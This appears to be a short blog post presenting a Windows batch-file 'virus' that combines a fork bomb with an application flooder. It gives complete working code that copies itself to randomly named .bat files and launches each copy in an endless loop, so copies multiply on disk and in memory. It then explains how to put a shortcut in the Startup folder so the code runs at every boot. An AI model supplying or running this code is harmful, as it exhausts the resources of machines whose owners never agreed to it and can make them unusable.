The thing about machines is that they all have a limit
This virus combines the best of the fork bomb and the application flooder.It creates a new batch file in the same directory and then copies itself onto this new file. It then starts this new virus and then both of them create another copy of themselves which are then run and the process repeats over and over and we have an exponential growth in the number of viruses on disk and in memory (RAM).
So let’s have a look:
@echo off
:A
set x=%random%
type %0 >> %x%.bat
start %x%.bat
goto:A
(Optional) To make this file execute automatically at startup, Do the following. Create a shortcut of the damage.bat file by right clicking on it. Open the start menu, In programs Open Startup folder and simply drag or cut-paste the shortcut into this folder. The virus will break loose the next time the computer is started up.
No comments:
Post a Comment